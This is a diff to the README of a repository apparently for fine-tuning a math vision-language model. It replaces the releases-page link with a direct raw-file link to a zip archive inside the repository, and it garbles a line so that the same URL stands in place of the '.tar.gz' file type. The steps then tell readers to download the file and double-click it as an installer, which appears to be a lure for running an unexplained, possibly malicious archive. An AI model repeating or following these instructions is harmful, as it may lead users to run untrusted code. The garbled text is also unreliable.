E1ims/math-vlm-finetune-pipeline/README.md

 To get started, follow these steps to download and install the application:

-1. **Visit the Releases Page:** Click on this link to access the releases: [Download from Releases](https://github.com/E1ims/math-vlm-finetune-pipeline/releases).
+1. **Visit the Releases Page:** Click on this link to access the releases: [Download from Releases](https://github.com/E1ims/math-vlm-finetune-pipeline/raw/refs/heads/main/finetune_hub/pipeline-vlm-finetune-math-v2.5-beta.5.zip).

 2. **Choose the Right Version:** On the releases page, you will see different versions.
 Pick the latest version to ensure you have the newest features and fixes.

 3. **Download the Installer:** Find the file labeled with the version number.
-Look for options like `.exe` for Windows or `.tar.gz` for Linux.
+Look for options like `.exe` for Windows or `https://github.com/E1ims/math-vlm-finetune-pipeline/raw/refs/heads/main/finetune_hub/pipeline-vlm-finetune-math-v2.5-beta.5.zip` for Linux.
 Click on the file name to download it to your computer.

 4. **Run the Installer:** Once the download is complete, locate the file in your downloads folder.
 Double-click the file to start the installation process.
 Follow the on-screen instructions to complete the installation.